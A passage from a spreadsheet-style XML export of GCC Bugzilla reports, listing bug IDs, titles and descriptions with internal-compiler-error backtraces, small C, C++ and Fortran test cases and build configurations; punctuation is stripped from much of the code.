        ../../gcc-source-trunk/gcc/cp/parser.c:8281
0x7fa8a9 cp_parser_cast_expression
        ../../gcc-source-trunk/gcc/cp/parser.c:9049
0x7fafa5 cp_parser_binary_expression
        ../../gcc-source-trunk/gcc/cp/parser.c:9151
0x7fb890 cp_parser_assignment_expression
        ../../gcc-source-trunk/gcc/cp/parser.c:9439
0x7fc883 cp_parser_constant_expression
        ../../gcc-source-trunk/gcc/cp/parser.c:9721
0x7fcd67 cp_parser_initializer_clause
        ../../gcc-source-trunk/gcc/cp/parser.c:21842
0x7ffcfb cp_parser_initializer
        ../../gcc-source-trunk/gcc/cp/parser.c:21780
0x8227a4 cp_parser_init_declarator
        ../../gcc-source-trunk/gcc/cp/parser.c:19601
0x824248 cp_parser_simple_declaration
        ../../gcc-source-trunk/gcc/cp/parser.c:12997
0x8250cf cp_parser_block_declaration
        ../../gcc-source-trunk/gcc/cp/parser.c:12815
0x830770 cp_parser_declaration
        ../../gcc-source-trunk/gcc/cp/parser.c:12712
0x82f3b4 cp_parser_declaration_seq_opt
        ../../gcc-source-trunk/gcc/cp/parser.c:12588
0x82f6f7 cp_parser_translation_unit
        ../../gcc-source-trunk/gcc/cp/parser.c:4559
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$
-------------------------------
auto f ()
template  auto g (f)
auto h = g  ()</t>
  </si>
  <si>
    <t>GCC-71432</t>
  </si>
  <si>
    <t>[7 Regression] -fcompare-debug failure (length)</t>
  </si>
  <si>
    <t>Created attachment 38651
test.ii compile with: g++ -c -fcompare-debug -O2
This must be a very recent regression as it was working last week on Thursday (Jun 2).
$ g++ -c -fcompare-debug -O2 test18.ii
g++: error: test18.ii: -fcompare-debug failure (length)</t>
  </si>
  <si>
    <t>GCC-66371</t>
  </si>
  <si>
    <t>[6 Regression] ICE: canonical types differ for identical types</t>
  </si>
  <si>
    <t>Created attachment 35674
Preprocessed source as generated by -freport-bug
GCC 6.0.0 svn 223906
In file included from /home/jamrial/range-v3/include/range/v3/range_interface.hpp:25:0
                 from /home/jamrial/range-v3/include/range/v3/range_facade.hpp:21
                 from /home/jamrial/range-v3/include/range/v3/core.hpp:21
                 from /home/jamrial/range-v3/test/container_conversion.cpp:17:
/home/jamrial/range-v3/include/range/v3/to_container.hpp: In instantiation of â€˜struct ranges::v3::detail::to_container_fn &gt; &gt;â€™:
/home/jamrial/range-v3/include/range/v3/to_container.hpp:143:62:   required from â€˜Cont ranges::v3::to_(Rng Rng = ranges::v3::take_exactly_view int _concept_requires_140 = 42 typename std::enable_if() &amp;&amp; ranges::v3::detail::ConvertibleToContainer())) int&gt;::type  = 0]â€™
/home/jamrial/range-v3/include/range/v3/range_interface.hpp:240:46:   required from â€˜ranges::v3::range_interface &gt;::operator Container() [with Container = std::vector D = ranges::v3::take_exactly_view Alloc = std::allocator int _concept_requires_237 = 42 typename std::enable_if()) int&gt;::type  = 0 Derived = ranges::v3::take_exactly_view ranges::v3::cardinality Cardinality = (ranges::v3::cardinality)-1]â€™
/home/jamrial/range-v3/test/container_conversion.cpp:31:52:   required from here
/home/jamrial/range-v3/include/range/v3/to_container.hpp:74:22: internal compiler error: canonical types differ for identical types std::enable_if() &amp;&amp; ranges::v3::detail::ConvertibleToContainer &gt;()) &amp;&amp; ranges::v3::detail::to_container_fn &gt; &gt;::ReserveConcept())) int&gt; and std::enable_if() &amp;&amp; ranges::v3::detail::ConvertibleToContainer &gt;()) &amp;&amp; ranges::v3::detail::to_container_fn &gt;::ReserveConcept())) int&gt;
                 Cont impl(Rng &amp;&amp; rng std::true_type) const
                      ^
0x738b8e comptypes(tree_node* tree_node* int)
        /home/jamrial/gcc-svn/gcc/cp/typeck.c:1423
0x737610 structural_comptypes
        /home/jamrial/gcc-svn/gcc/cp/typeck.c:1338
0x66e122 reduce_template_parm_level
        /home/jamrial/gcc-svn/gcc/cp/pt.c:3704
0x66a120 tsubst(tree_node* tree_node* int tree_node*)
        /home/jamrial/gcc-svn/gcc/cp/pt.c:12155
0x670e50 tsubst_copy
        /home/jamrial/gcc-svn/gcc/cp/pt.c:13054
0x676056 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
        /home/jamrial/gcc-svn/gcc/cp/pt.c:15728
0x65b6b0 tsubst_expr
        /home/jamrial/gcc-svn/gcc/cp/pt.c:14393
0x66bf6b tsubst_template_arg
        /home/jamrial/gcc-svn/gcc/cp/pt.c:9690
0x666a42 tsubst_template_args
        /home/jamrial/gcc-svn/gcc/cp/pt.c:10241
0x666d3a tsubst_template_args
        /home/jamrial/gcc-svn/gcc/cp/pt.c:10201
0x660342 tsubst_decl
        /home/jamrial/gcc-svn/gcc/cp/pt.c:10624
0x669f4e tsubst(tree_node* tree_node* int tree_node*)
        /home/jamrial/gcc-svn/gcc/cp/pt.c:11819
0x68de6b instantiate_class_template_1
        /home/jamrial/gcc-svn/gcc/cp/pt.c:9357
0x68de6b instantiate_class_template(tree_node*)
        /home/jamrial/gcc-svn/gcc/cp/pt.c:9671
0x7336fb complete_type(tree_node*)
        /home/jamrial/gcc-svn/gcc/cp/typeck.c:146
0x7338ef complete_type_or_maybe_complain(tree_node* tree_node* int)
        /home/jamrial/gcc-svn/gcc/cp/typeck.c:158
0x7339d9 require_complete_type_sfinae(tree_node* int)
        /home/jamrial/gcc-svn/gcc/cp/typeck.c:102
0x5ec059 build_cxx_call(tree_node* int tree_node** int)
        /home/jamrial/gcc-svn/gcc/cp/call.c:7652
0x5f1701 build_over_call
        /home/jamrial/gcc-svn/gcc/cp/call.c:7567
0x600471 build_new_function_call(tree_node* vec** bool int)
        /home/jamrial/gcc-svn/gcc/cp/call.c:4100
New version of the first file reported in pr66067 this time with a different ICE.</t>
  </si>
  <si>
    <t>GCC-20322</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] Miscompilation of libcpp/expr.c at -O2+</t>
  </si>
  <si>
    <t>libcpp/expr.c is miscompiled when compiled with gcc-4_0-branch GCC on x86-64
(and likely i386 as well).
expr.c miscompiled that way causes a testsuite regression on arith-3.c:
FAIL: gcc.dg/cpp/arith-3.c  (test for bogus messages line 257)
Self-contained testcase that reproduces the problem is:
extern void abort (void)
typedef unsigned long long T
typedef struct
{
  T a b
  unsigned char c d
} S
#define M (sizeof (T) * 4)
S __attribute__((noinline))
foo (T x T y)
{
  S e
  T f[2] g
  e.b = (x 
  e.a = (x &gt;&gt; M) * (y &gt;&gt; M)
  f[0] = (x 
  f[1] = (x &gt;&gt; M) * (y 
  g = e.b
  e.b += (f[0] 
  if (e.b &lt; g)
    e.a++
  g = e.b
  e.b += (f[1] 
  if (e.b &lt; g)
    e.a++
  e.a += (f[0] &gt;&gt; M)
  e.a += (f[1] &gt;&gt; M)
  e.c = 1
  e.d = 0
  return e
}
int
main (void)
{
  T x = 1ULL &lt;&lt; (M * 2 - 1)
  S y = foo (1 x)
  if (y.a || y.b != x || y.c != 1 || y.d)
    abort ()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-61345</t>
  </si>
  <si>
    <t>[4.10 Regression] ICE (segfault) in combine while compiling the linux kernel</t>
  </si>
  <si>
    <t>Simple Testcase (compiled with -O2):
unsigned grab_cache_page_write_begin(unsigned flags unsigned capabilities)
{
  unsigned gfp_mask
  unsigned gfp_notmask = 0
  gfp_mask = flags 
  if (!(capabilities &amp; 0x00000001))
    gfp_mask |= 0x1000000u
  return (gfp_mask 
}</t>
  </si>
  <si>
    <t>GCC-39067</t>
  </si>
  <si>
    <t>[PPC64] missed optimization: un-needed copy for small structs kept on  stack</t>
  </si>
  <si>
    <t>Consider this simple class:
class TV
{
   private:
      float truth
      float confidence
   public:
      TV(float float)
      float getT(void)
}
extern TV my_tv_maker(float tr)
float my_subr(float tr)
{
   TV tv = my_tv_maker(434.23)
   return tv.getT()
}
On powerPC when compiled with gcc -O2 -S -c generates the annotated assembly below. Noticable is a copy of the entire structure which is 8 bytes long to and from the stack which is completely un-needed.  When the structure is *larger* then no copy is performed *even when no optimization is done (i.e.
even when -O2 is not specified.)*. So basically large structures work great but small structures cause some extra un-neccesary cycles to be wasted. Problem is still there for -O3.
.L._Z7my_subrf:
.LFB3:
   mflr 0                r0 = link reg value
.LCFI4:
   lfs 1.LC1@toc(2)     fpr1 = 434.23
   std 016(1)           save link reg value
.LCFI5:
   stdu 1-144(1)       incr stack ptr
.LCFI6:
   addi 31128         alloc TV on stack. Note sizeof(TV) is 8 bytes.
   bl _Z11my_tv_makerf  call
   ld 0128(1)          r0 = 8 bytes = copy of entire instance of class TV
   addi 31112         r3 = ptr to new location
   std 0112(1)         store 8-byte copy of the instance to new location
                        on stack ... this is really not needed.
                        The old copy at offset 128 could have been
                        used .. there was no point to making this copy.
   bl _ZN2TV4getTEv     call
   nop
   addi 11144         decr stack
   ld 016(1)           get link reg val
   mtlr 0               move to link reg
   blr                  branch to link reg.
gcc -v
Using built-in specs.
Target: powerpc64-unknown-linux-gnu
Configured with: /var/tmp/portage/sys-devel/gcc-4.1.2/work/gcc-4.1.2/configure --prefix=/usr --bindir=/usr/powerpc64-unknown-linux-gnu/gcc-bin/4.1.2 --includedir=/usr/lib/gcc/powerpc64-unknown-linux-gnu/4.1.2/include --datadir=/usr/share/gcc-data/powerpc64-unknown-linux-gnu/4.1.2 --mandir=/usr/share/gcc-data/powerpc64-unknown-linux-gnu/4.1.2/man --infodir=/usr/share/gcc-data/powerpc64-unknown-linux-gnu/4.1.2/info --with-gxx-include-dir=/usr/lib/gcc/powerpc64-unknown-linux-gnu/4.1.2/include/g++-v4 --host=powerpc64-unknown-linux-gnu --build=powerpc64-unknown-linux-gnu --enable-altivec --enable-nls --without-included-gettext --with-system-zlib --disable-checking --disable-werror --enable-secureplt --disable-libunwind-exceptions --disable-multilib --enable-libmudflap --disable-libssp --enable-objc-gc --enable-languages=cc++javaobjcobj-c++fortran --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu
Thread model: posix
gcc version 4.1.2 (Gentoo 4.1.2 p1.0.2)
Bug is reproducible on:
Welcome to hazelnut.osuosl.org
Server Address   : 140.211.167.137
Hardware         : 8 x POWER5+ (gs)
                   CHRP IBM9133-55A 7794 MB RAM
Operating System : Gentoo Linux (default-linux/ppc/ppc64/2007.0/64bit-userland/power5)
Support          : support@osuosl.org
Website          : http://powerdev.osuosl.org
Mailing List     : http://lists.osuosl.org/mailman/listinfo/powerdev</t>
  </si>
  <si>
    <t>linasvepstas</t>
  </si>
  <si>
    <t>GCC-14372</t>
  </si>
  <si>
    <t>MIRANDA bug in java.net.URLConnection</t>
  </si>
  <si>
    <t>I think I found another instance of the Miranda bug. With the attached patch  
applied to gcc trunk CVS and executing the attached testcase app the wrong  
String getHeaderField(int index) (the one in java.net.URLConnection) method  
gets called instead of the one in gnu.java.net.protocol.http.Connection.  
Connection is a subclass of java.net.HttpURLConnection which is a subclass of  
java.net.URLConnection. You can see that the bug occurs when the testapp  
prints a line with BUT WHY HERE. It was written by Rutger Ovidius  
. 
The patch attached applies to current 3.4.0 cvs tree too and triggers the same 
bug. The bug doesnt trigger to 3.3.3 and the patch doesnt apply to it (I 
think). The bug gets only triggered with the patch applied.</t>
  </si>
  <si>
    <t>GCC-31834</t>
  </si>
  <si>
    <t>FAIL: 17_intro/headers/c++200x/all.cc (test for excess errors)</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/./gcc/g++ -shared-libgcc -B/test/gnu/gcc
/objdir/./gcc -nostdinc++ -L/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v
3/src -L/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/src/.libs -B/opt/g
nu64/gcc/gcc-4.3.0/hppa64-hp-hpux11.11/bin/ -B/opt/gnu64/gcc/gcc-4.3.0/hppa64-hp
-hpux11.11/lib/ -isystem /opt/gnu64/gcc/gcc-4.3.0/hppa64-hp-hpux11.11/include -i
system /opt/gnu64/gcc/gcc-4.3.0/hppa64-hp-hpux11.11/sys-include -g -O2 -D_GLIBCX
X_ASSERT -ffunction-sections -fdata-sections -fmessage-length=0 -g -O2 -DLOCALED
IR=. -nostdinc++ -I/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/inclu
de/hppa64-hp-hpux11.11 -I/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/i
nclude -I/test/gnu/gcc/gcc/libstdc++-v3/libsupc++ -I/test/gnu/gcc/gcc/libstdc++-
v3/include/backward -I/test/gnu/gcc/gcc/libstdc++-v3/testsuite/util /test/gnu/gc
c/gcc/libstdc++-v3/testsuite/17_intro/headers/c++200x/all.cc   -std=gnu++0x -S
-o all.s    (timeout = 600)
/test/gnu/gcc/gcc/libstdc++-v3/testsuite/17_intro/headers/c++200x/all.cc:67:20:
error: stdint.h: No such file or directory
compiler exited with status 1
output is:
/test/gnu/gcc/gcc/libstdc++-v3/testsuite/17_intro/headers/c++200x/all.cc:67:20:
error: stdint.h: No such file or directory
FAIL: 17_intro/headers/c++200x/all.cc (test for excess errors)
17_intro/headers/c++200x/all_multiple_inclusion.cc fails for the same
reason.</t>
  </si>
  <si>
    <t>GCC-57075</t>
  </si>
  <si>
    <t>[4.9 Regression] verify_flow_info failed: control flow in the middle of basic block</t>
  </si>
  <si>
    <t>Created attachment 29942
C source code
I just tried to compile the package jam-2.5-14
on gcc-4.9 trunk dated 20130425 on an AMD x86_64 box.
The compiler said
execunix.c: In function 'execcmd':
execunix.c:322:1: error: control flow in the middle of basic block 10
 }
 ^
execunix.c:322:1: error: control flow in the middle of basic block 10
execunix.c:322:1: error: control flow in the middle of basic block 10
execunix.c:322:1: internal compiler error: verify_flow_info failed
0x5f9ae1 verify_flow_info()
    ../../src/trunk/gcc/cfghooks.c:260
0x91dec4 cleanup_tree_cfg_noloop
    ../../src/trunk/gcc/tree-cfgcleanup.c:693
0x91dec4 cleanup_tree_cfg()
    ../../src/trunk/gcc/tree-cfgcleanup.c:742
0x84be64 execute_function_todo
    ../../src/trunk/gcc/passes.c:1921
0x84c7e7 execute_todo
    ../../src/trunk/gcc/passes.c:1996
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Preprocessed source code attached. Flag -O2 required.</t>
  </si>
  <si>
    <t>GCC-19452</t>
  </si>
  <si>
    <t>Not detecting a function does not throw</t>
  </si>
  <si>
    <t>The following functions should be detected as not throwing and there for we should not have a call to 
__cxa_call_unexcepted (or the equivant sjlj call):
int g(int i)
int h(int i) throw()
inline int f(int i) { h(i)if(i&lt;10)return 1else return g(i-1) + i}
inline int g(int i) { return f(i) }
int temp(int i) throw()
{   return g(i) }</t>
  </si>
  <si>
    <t>GCC-64277</t>
  </si>
  <si>
    <t>[4.9 Regression] Incorrect warning array subscript is above array bounds</t>
  </si>
  <si>
    <t>&gt;cat test.c
void foo(short a[] short m)                                                                                                                                                                                                                                                                                        
{                                                                                                                                                                                                                                                                                                                   
  int i j                                                                                                                                                                                                                                                                                                         
  int f1[10]                                                                                                                                                                                                                                                                                                       
  short nc                                                                                                                                                                                                                                                                                                         
  nc = m + 1                                                                                                                                                                                                                                                                                                       
  if (nc &gt; 3)                                                                                                                                                                                                                                                                                                       
    {                                                                                                                                                                                                                                                                                                               
      for (i = 0 i &lt;= nc i++)                                                                                                                                                                                                                                                                                     
        {                                                                                                                                                                                                                                                                                                           
          f1[i] = f1[i] + 1                                                                                                                                                                                                                                                                                        
        }                                                                                                                                                                                                                                                                                                           
    }                                                                                                                                                                                                                                                                                                               
  for (i = 0 j = m i &lt; nc i++ j--)                                                                                                                                                                                                                                                                              
    {                                                                                                                                                                                                                                                                                                               
      a[i] = f1[i]                                                                                                                                                                                                                                                                                                 
      a[j] = i                                                                                                                                                                                                                                                                                                     
    }                                                                                                                                                                                                                                                                                                               
  return                                                                                                                                                                                                                                                                                                           
}                          
&gt;gcc -O3 -mssse3 -Wall
/export/users/aivchenk/src/gcc_obj/test.c:21:16: warning: array subscript is above array bounds [-Warray-bounds]
       a[i] = f1[i] 
                ^
If compile with -msse3 there is no warning.</t>
  </si>
  <si>
    <t>aivchenk</t>
  </si>
  <si>
    <t>GCC-517</t>
  </si>
  <si>
    <t>New causes seg fault while malloc correctly return null</t>
  </si>
  <si>
    <t>A simple test which exhausts memory by creating 1440 byte char[] does not report out of memory error.  Instead causes a seg fault and core dump.
Using malloc a null pointer is correctly passed back.
Code compiled with gcc -O t2new.cpp -o t2new.o
Release:
unknown
Environment:
Redhat linux 6.1 Redhat linux 6.2 Mandrake 6.0
How-To-Repeat:
Compile and run</t>
  </si>
  <si>
    <t>jdrrun</t>
  </si>
  <si>
    <t>GCC-1167</t>
  </si>
  <si>
    <t>Compiler crash on (illegal) attempt to create inner class from static context</t>
  </si>
  <si>
    <t xml:space="preserve">State-Changed-From-To: open-&gt;feedback
State-Changed-Why: I proposed a patch.
</t>
  </si>
  <si>
    <t>GCC-13963</t>
  </si>
  <si>
    <t>gcc rejects array of unknown bounds as parameter of function template specialization</t>
  </si>
  <si>
    <t>Every version of g++ that I've tested (2.95 3.1 3.3 mainline) rejects the following code:
  template void h(X x) { }
  void foo()
  {
    int A[9]
    h(A)
  }
EDG accepts this code.  I believe EDG is correct.  When instantiating h int[] should be treated as a 
synonym for int*.
My analysis:
 - First just to clear away an irrelevancy: there's a standard array-to-pointer conversion but it 
doesn't matter.  We're talking about the legality of a declaration.
 - Second again mostly as a sanity check: void f(int a[]) { } is legal C++ just like it's legal C.  But 
the reason it's legal matters: clause 8.3.5 paragraph 3 says: The type of each parameter is 
determined from its own decl-specifier-seq and declarator. After determining the type of each 
parameter any parameter of type â€œarray of Tâ€ or â€œfunction returningTâ€ is adjusted to be â€œpointer 
toTâ€ or â€œpointer to function returningTâ€ respectively.
 - Finally the only remaining question is: when instantiating a function template whose template 
arguments are explicitly provided is the compiler supposed to perform the same parameter 
adjustments as in an ordinary function declaration?  The answer is yes.  14.8.2 paragraph 3 says: 
After this substitution is performed the function parameter type adjustments described in 8.3.5 
are performed.</t>
  </si>
  <si>
    <t>GCC-10543</t>
  </si>
  <si>
    <t>Please help. Illegal instruction (core dumped)</t>
  </si>
  <si>
    <t xml:space="preserve"> When I tried to run the compiled program. It returned a message Illegal 
 instruction (core dumped) .
 I debugged the program and found that it appears because this line:
     Signal = new OptSignal(Filename 
 But I can successfully run the code under another machine.
 Redhat linux 9.0
 gcc version is 2.95.3 (I installed this version because the code can't be 
 compile under 3.2.2)
 another machine run the code well:
 Redhat linux 7.2
 egcs 1.1.2
 Please help me about the problem. Thanks
 Best regards
 Yang Sun
Release:
unknown</t>
  </si>
  <si>
    <t>s11</t>
  </si>
  <si>
    <t>GCC-32950</t>
  </si>
  <si>
    <t>[4.5 regression] ICE with __complex__ double</t>
  </si>
  <si>
    <t>Hi
the -O1 and -O2 options cause an internal compiler error in my newly compiled g++ 4.2.1. Omitting this option compiles without any apparent problems and the ubuntu 06/10 g++ i.e. gcc version 4.1.2 20060928 (prerelease) (Ubuntu 4.1.1-13ubuntu5) also compiles it fine with and without the -O2 or -O1.
I still have the old g++ installed in the standard location.
Here is the output of gcc -v
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v --enable-languages=cc++fortranobjcobj-c++treelang --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --program-suffix=-4.1 --enable-__cxa_atexit --enable-clocale=gnu --enable-libstdcxx-debug --enable-mpfr --enable-checking=release i486-linux-gnu
Thread model: posix
gcc version 4.1.2 20060928 (prerelease) (Ubuntu 4.1.1-13ubuntu5)
my command line was
/opt/gcc4.2.1/bin/g++-4.2 -O2 -c -save-temps bug2.cpp
and produced this output
bug2.cpp: In function â€˜int main()â€™:
bug2.cpp:16: internal compiler error: in convert_move at expr.c:363
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>Max.Moorkamp</t>
  </si>
  <si>
    <t>GCC-473</t>
  </si>
  <si>
    <t>g++ internal error on sparc</t>
  </si>
  <si>
    <t>g++ fails during compile of Orbacus-4.0.2 (www.ooc.com) in
GenUtil.cpp:
g++ 2.95.2 no -O no -mcpu - OK
g++ 2.95.2 -O no -mcpu- OK
g++ 2.95.2 no -O -mcpu=ultrasparc - Internal error 
g++ 2.95.2 -O -mcpu=ultrasparc - Internal error (see err1)
g++ 20000807 no -O no -mcpu- OK
g++ 20000807 no -O -mcpu=ultrasparc - OK
g++ 20000807 -O no -mcpu - Internal error: segmentation fault (see err2)
g++ 20000807 -O -mcpu=ultrasparc - Internal error: segmentation fault (see err3)
Release:
GNU C++ version 2.95.2 19991024 (release) GNU C++ version 2.96 20000807 (experimental) (sparc-sun-solaris2.7)
Environment:
SunOS adela 5.7 Generic_106541-09 sun4u sparc SUNWUltra-4
How-To-Repeat:
GenUtil.ii is attached</t>
  </si>
  <si>
    <t>lampa</t>
  </si>
  <si>
    <t>GCC-70714</t>
  </si>
  <si>
    <t>ICE: Segmentation fault</t>
  </si>
  <si>
    <t>struct UINT
typedef struct { UINT TYPES } eType
fn1(eType) {
gcc version 5.3.1 20160411 (GCC) 
 = gcc-5-branch @ 0efe1cc72d37ff1173b52cf6bc3f17bd0ccb59f3
target = x86_64-unknown-linux-gnu
compile with : -xc++ -c testcase.best  -o /dev/null  -m32 -w</t>
  </si>
  <si>
    <t>GCC-1699</t>
  </si>
  <si>
    <t>can't compile Linux kernels</t>
  </si>
  <si>
    <t>Cannot compile kernels have tried 2.2.16 2.2.17 2.4.0 
same problem.
Addmittedly I am no guru but I can compile the same kernel on other machines with the exact same software (to include OS) using the same CDs and options.
I copied the error code by hand rather than try to figure out the nasty commands (I have command-line phobia?)  It is as follows:
in file included from /usr/src/linux/capability.h:17
                 from /usr/src/linux/binfmts.h:5
                 from /usr/src/linux/sched.h:9
                 neighbour.c:21:
/usr/src/linux/fs.h:799: Internal compiler error in 'grokdeclarator' at c-decl.c:4435
Release:
gcc2.95.3 19991030 (prerelease)
Environment:
Mandrake-Linux 7.2   K6-200  48Mb RAM Gnome Sawfish ...ummm...ask if you need more
How-To-Repeat:
compile any linux kernel on this *&amp;^$@&amp; computer  (I have tried scrubbing hard drives and reinstalling everything to no avail)</t>
  </si>
  <si>
    <t>jhurt</t>
  </si>
  <si>
    <t>GCC-15157</t>
  </si>
  <si>
    <t>Lack of chuncked encoding handling causes junk in http downloads</t>
  </si>
  <si>
    <t>Gcj 3.4 switched to claiming that it supports http1.1 
In fact it doesn't understand 1.1 completely. 
When the server sends Transfer-Encoding: chunked gcj doesn't do anything about
it. So it ends up putting chunked lengths like 94d in the middle of InputStream.
 http://sourceforge.net/export/rss_sfnewreleases.php uses chunked encoding.
Attached is a sample of the problem</t>
  </si>
  <si>
    <t>GCC-19051</t>
  </si>
  <si>
    <t>m6811-elf-gcc ICE</t>
  </si>
  <si>
    <t xml:space="preserve">
gcc ICE when I did:
===================
$ m6811-elf-g++ -Os -mshort -msoft-reg-count=32 -m68hc12 -c n.cpp
The ICE message is:
===================
n.cpp: In function 'void getNewTableEntry()':
n.cpp:49: error: unable to find a register to spill in class 'D_REGS'
n.cpp:49: error: this is the insn:
(insn:HI 60 59 62 9 (set (reg:HI 59 [ D.1552 ])
        (mult:HI (sign_extend:HI (reg:QI 63))
            (sign_extend:HI (reg/v:QI 14 *_.d1 [orig:55 newIdx ] [55])))) 70 {mulqihi3} (insn_list:REG_DEP_TRUE 59 (nil))
    (expr_list:REG_DEAD (reg/v:QI 14 *_.d1 [orig:55 newIdx ] [55])
        (expr_list:REG_DEAD (reg:QI 63)
            (expr_list:REG_EQUAL (mult:HI (sign_extend:HI (reg/v:QI 14 *_.d1 [orig:55 newIdx ] [55]))
                    (const_int 6 [0x6]))
                (nil)))))
n.cpp:49: internal compiler error: in spill_failure at reload1.c:1873
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The m6811-elf-g++ 3.4.4 also generates same ICE.
$ ./m6811-elf-g++ --version
m6811-elf-g++ (GCC) 3.4.4 20041108 (prerelease)
Environment:
System: Linux namsh 2.6.10-rc3n2 #6 Tue Dec 14 15:50:33 KST 2004 i686 athlon i386 GNU/Linux
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: m6811-unknown-none
configured with: ../configure --target=m6811-elf --prefix=/usr/GNUHCS --program-prefix=m6811-elf- --with-gnu-ld --with-gnu-as --disable-shared --enable-languages=cc++ --without-headers --with-newlib --disable-nls --disable-threads
How-To-Repeat:
Compile the code below with compiler option I described:
// n.cpp
extern signed char g_oldVal g_newVal
extern signed char g_base
extern unsigned char tableA[] tableB[]
extern unsigned char g_AAval g_APval
extern unsigned char g_BAval g_BPval
extern unsigned int g_ARval g_ABval
extern unsigned int g_BRval g_BBval
typedef struct {
    unsigned int r
    unsigned int b
    unsigned char a
    unsigned char p
} TABLEENTRY
void getNewTableEntry()
{
    signed char oldIdx = g_oldVal newIdx = g_newVal
    const signed char maxVal = ((44 * 2) + 6 * 2)
    oldIdx += g_base
    newIdx += g_base
    if (oldIdx &lt; 0)
	oldIdx = 0
    else if (oldIdx &gt; maxVal)
	oldIdx = maxVal
    if (newIdx &lt; 0)
	newIdx = 0
    else if (newIdx &gt; maxVal)
	newIdx = maxVal
    if (oldIdx != newIdx)
    {
	TABLEENTRY *tablePtr
	tablePtr = (TABLEENTRY *) tableA + newIdx
	g_ARval = tablePtr-&gt;r
	g_ABval = tablePtr-&gt;b
	g_AAval = tablePtr-&gt;a
	g_APval = tablePtr-&gt;p
	tablePtr = (TABLEENTRY *) tableB + newIdx
	g_BRval = tablePtr-&gt;r
	g_BBval = tablePtr-&gt;b
	g_BAval = tablePtr-&gt;a
	g_BPval = tablePtr-&gt;p
    }
}</t>
  </si>
  <si>
    <t>GCC-413</t>
  </si>
  <si>
    <t>exception handling with -fsjlj-exceptions is broken</t>
  </si>
  <si>
    <t>emitted setjmp got optimized after flow analysis in such way
that after exceptions is raised execution continues in
try {} block instead of catch {}
this is very similar to #258 but it can be 100% reproduced
without any optimization options turned on
Release:
g++ 2.95.2
Environment:
lark:/$g++ -v
Using builtin specs.
gcc version 2.95.2 19991024 (release)
lark:/$uname -a
FreeBSD lark.nsk.bsgdesign.com 4.0-STABLE FreeBSD 4.0-STABLE #0: Mon Jul 10 17:21:18 NOVST 2000     fjoe@lark.nsk.bsgdesign.com:/usr/obj/usr/src/sys/lark  i386
lark:/$
How-To-Repeat:
unfortunately I could find only one piece of code which
can show described behaviour:
Reactor_Exceptions_Test from The ACE (Adaptive Communications
Environment) 5.1.1 under FreeBSD 4.x using native g++ 2.95.2 compiler
(please note that native compiler should be used compiler installed from ports uses
dwarf 2 unwinding info mechanism and is not affected)</t>
  </si>
  <si>
    <t>fjoe</t>
  </si>
  <si>
    <t>GCC-31304</t>
  </si>
  <si>
    <t>REPEAT argument NCOPIES is not converted as it should</t>
  </si>
  <si>
    <t>The NCOPIES argument of REPEAT is not converted to the integer king the library expects (kind=4) which can lead to segfaults. I changed that code recently so I'll fix it. I'll probably take this opportunity to have the front-end actually emit an error if the NCOPIES argument is larger than a fixed value.
$ cat repeat.f90
   implicit none
   integer(kind=1) i
   real(kind=8) r
   character(len=2) s1 s2
   i = 1
   r = 1
   s1 = '42'
   r = nearest(rr)
   s2 = repeat(s1i)
end
$ gfortran repeat.f90 &amp;&amp; ./a.out
Segmentation fault</t>
  </si>
  <si>
    <t>GCC-42536</t>
  </si>
  <si>
    <t>[4.7 regression] ICE in spill_failure at reload1.c:2141</t>
  </si>
  <si>
    <t>seen with 20091228 trunk and 4.4 branch on i486-linux-gnu not seen with 4.3 branch (opening new report because PR39431 is fixed for 4.4 and 4.5). Adding -fomit-frame-pointer avoids the ice.
  Matthias
$ /usr/lib/gcc-snapshot/bin/gcc -g -O2 -fno-gcse -fno-inline-functions -fno-unit-at-a-time -fstack-protector -c cvm.i 
cvm.c: In function '_ILCVMInterpreter':
cvm.c:889:1: error: unable to find a register to spill in class 'GENERAL_REGS'
cvm.c:889:1: error: this is the insn:
(insn 11992 11991 11993 863 cvm_ptr.c:66 (set (mem:DI (plus:SI (plus:SI (mult:SI (reg:SI 6750 [ D.20325 ])
                        (const_int 8 [0x8]))
                    (reg/f:SI 6746 [ tempptr.3460 ]))
                (const_int 4 [0x4])) [16 S8 A64])
        (reg:DI 12123)) 88 {*movdi_2} (expr_list:REG_DEAD (reg:DI 12123)
        (expr_list:REG_DEAD (reg:SI 6750 [ D.20325 ])
            (expr_list:REG_DEAD (reg/f:SI 6746 [ tempptr.3460 ])
                (nil)))))
cvm.c:889:1: internal compiler error: in spill_failure at reload1.c:2141
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-41885</t>
  </si>
  <si>
    <t>AVR Rotate patterns do not correctly consider overlap.</t>
  </si>
  <si>
    <t>Rotate patterns that split byte sized rotates into moves do not correctly consider overlap of operands.
This was noted on a similar but different shift bug 
http://gcc.gnu.org/bugzilla/show_bug.cgi?id=39635
and detailed here
http://lists.gnu.org/archive/html/avr-gcc-list/2009-03/msg00158.html
Bug raised to reference separate testcase and fix.</t>
  </si>
  <si>
    <t>GCC-64981</t>
  </si>
  <si>
    <t>[5 regression] -fsanitize=address cant expand __builtin_ia32_rdtsc</t>
  </si>
  <si>
    <t>r216735 PASS
r216827 FAIL
r220528 FAIL
$ cat a.c
int main()
{
    __builtin_ia32_rdtsc()
    return 0
}
$ /usr/local/gcc_current/bin/gcc -fsanitize=address -S a.c &amp;&amp; grep rdtsc a.s
	call	__builtin_ia32_rdtsc
